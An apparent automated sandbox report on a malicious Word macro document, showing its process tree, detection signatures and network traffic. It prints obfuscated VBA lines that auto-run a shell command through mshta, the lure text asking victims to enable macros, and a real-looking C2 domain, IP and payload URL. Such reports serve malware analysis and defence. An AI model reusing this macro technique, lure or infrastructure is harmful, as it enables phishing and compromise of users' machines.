Loading ...

Play interactive tourEdit tour

Windows Analysis Report enjoin,12.27.2021.doc

Overview

General Information

Sample Name:enjoin,12.27.2021.doc
Analysis ID:546767
MD5:7044bd240219ec2f83b01c532e2ce5ba
SHA1:745cdbc4a826c5960eef3f4a9aa307ff94e4b7fb
SHA256:ecd84fa8d836d5057149b2b3a048d75004ca1a1377fcf2f5e67374af3a1161a0
Tags:doc
Infos:

Most interesting Screenshot:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document contains an embedded VBA macro which may execute processes
Sigma detected: Suspicious MSHTA Process Patterns
Machine Learning detection for sample
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Document contains an embedded VBA macro which executes code when the document is opened / closed
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Searches for user specific document files
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Document contains an embedded VBA macro which reads document properties (may be used for disguise)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2632 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • explorer.exe (PID: 3004 cmdline: explorer i7Gigabyte.hta MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • explorer.exe (PID: 2780 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • mshta.exe (PID: 2964 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious MSHTA Process PatternsShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" , CommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2780, ProcessCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" , ProcessId: 2964

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: enjoin,12.27.2021.docReversingLabs: Detection: 44%
Machine Learning detection for sampleShow sources
Source: enjoin,12.27.2021.docJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe
Source: global trafficDNS query: name: patelboostg.com
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.67.229.54:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.67.229.54:80
Source: Joe Sandbox ViewIP Address: 45.67.229.54 45.67.229.54
Source: global trafficHTTP traffic detected: GET /frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob0 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: patelboostg.comConnection: Keep-Alive
Source: mshta.exe, 00000004.00000002.419910763.0000000006CAA000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000004.00000002.419910763.0000000006CAA000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000004.00000002.417946104.0000000003D37000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000004.00000002.417946104.0000000003D37000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000004.00000003.416145153.000000000050F000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.417236396.00000000004EC000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.417153403.0000000000444000.00000004.00000020.sdmp, mshta.exe, 00000004.00000002.419957947.0000000006CBD000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.416821564.00000000004A0000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.416902937.00000000004A3000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.416884776.0000000006CBD000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.415996164.00000000004A0000.00000004.00000001.sdmpString found in binary or memory: http://patelboostg.com/frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qA
Source: explorer.exe, 00000002.00000002.407152025.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.407524765.0000000001D80000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.418206681.0000000003F30000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mshta.exe, 00000004.00000002.417946104.0000000003D37000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000004.00000002.417946104.0000000003D37000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000002.00000002.407152025.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.407524765.0000000001D80000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.418206681.0000000003F30000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000004.00000002.417946104.0000000003D37000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{32ACE746-D13A-408F-AE74-06CF9FEDB16D}.tmpJump to behavior
Source: unknownDNS traffic detected: queries for: patelboostg.com
Source: global trafficHTTP traffic detected: GET /frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob0 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: patelboostg.comConnection: Keep-Alive
Source: C:\Windows\SysWOW64\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content" O Page: I of I , Words:
Source: Screenshot number: 4Screenshot OCR: Enable content" O Page: I of I , Words: 118 i C i N@m 13 ;a 10096 G) FI G) ,, " I "I Wb, lymm
Document contains an embedded VBA macro which may execute processesShow sources
Source: enjoin,12.27.2021.docOLE, VBA macro line: CreateObject("wsc" + cont1("company") + "ell").exec cont1("category") + " " + mouseVideo
Source: enjoin,12.27.2021.docOLE, VBA macro line: Sub Document_Open()
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: enjoin,12.27.2021.docOLE indicator, VBA macros: true
Source: enjoin,12.27.2021.docOLE, VBA macro line: cont1 = activedocument.builtindocumentproperties(i7computermonitor).value
Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: 76E90000 page execute and read and write
Source: enjoin,12.27.2021.docReversingLabs: Detection: 44%
Source: C:\Windows\explorer.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe explorer i7Gigabyte.hta
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe explorer i7Gigabyte.hta
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta"
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: enjoin,12.27.2021.docOLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$join,12.27.2021.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCDC9.tmpJump to behavior
Source: classification engineClassification label: mal72.expl.winDOC@6/13@1/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
Source: enjoin,12.27.2021.docOLE document summary: title field not present or empty
Source: enjoin,12.27.2021.docOLE document summary: author field not present or empty
Source: enjoin,12.27.2021.docOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: enjoin,12.27.2021.docInitial sample: OLE summary comments = ta
Source: enjoin,12.27.2021.docInitial sample: OLE document summary bytes = 26624
Source: enjoin,12.27.2021.docInitial sample: OLE document summary category = explorer
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: enjoin,12.27.2021.docStream path 'Data' entropy: 7.93699752134 (max. 8.0)
Source: C:\Windows\explorer.exe TID: 3000Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe TID: 3000Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2924Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\mshta.exe TID: 2816Thread sleep time: -300000s >= -30000s
Source: explorer.exe, 00000003.00000003.406744382.000000000035E000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\Documents
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\mshta.exeDirectory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\mshta.exeDirectory queried: C:\Users\user\Documents

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting12Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerRemote System Discovery1SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSFile and Directory Discovery11Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting12LSA SecretsSystem Information Discovery14SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
enjoin,12.27.2021.doc44%ReversingLabsDocument-Excel.Trojan.Valyria
enjoin,12.27.2021.doc100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
patelboostg.com2%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://patelboostg.com/frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob04%VirustotalBrowse
http://patelboostg.com/frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob00%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://patelboostg.com/frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qA0%Avira URL Cloudsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
patelboostg.com
45.67.229.54
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://patelboostg.com/frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob0false
  • 4%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkmshta.exe, 00000004.00000002.417946104.0000000003D37000.00000002.00020000.sdmpfalse
    high
    http://www.windows.com/pctv.mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmpfalse
      high
      http://investor.msn.commshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtmshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmpfalse
          high
          http://www.%s.comPAexplorer.exe, 00000002.00000002.407152025.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.407524765.0000000001D80000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.418206681.0000000003F30000.00000002.00020000.sdmpfalse
          • URL Reputation: safe
          low
          http://www.icra.org/vocabulary/.mshta.exe, 00000004.00000002.417946104.0000000003D37000.00000002.00020000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000002.00000002.407152025.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.407524765.0000000001D80000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.418206681.0000000003F30000.00000002.00020000.sdmpfalse
            high
            http://patelboostg.com/frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAmshta.exe, 00000004.00000003.416145153.000000000050F000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.417236396.00000000004EC000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.417153403.0000000000444000.00000004.00000020.sdmp, mshta.exe, 00000004.00000002.419957947.0000000006CBD000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.416821564.00000000004A0000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.416902937.00000000004A3000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.416884776.0000000006CBD000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.415996164.00000000004A0000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truemshta.exe, 00000004.00000002.417946104.0000000003D37000.00000002.00020000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oemshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmpfalse
              high
              http://investor.msn.com/mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmpfalse
                high

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                45.67.229.54
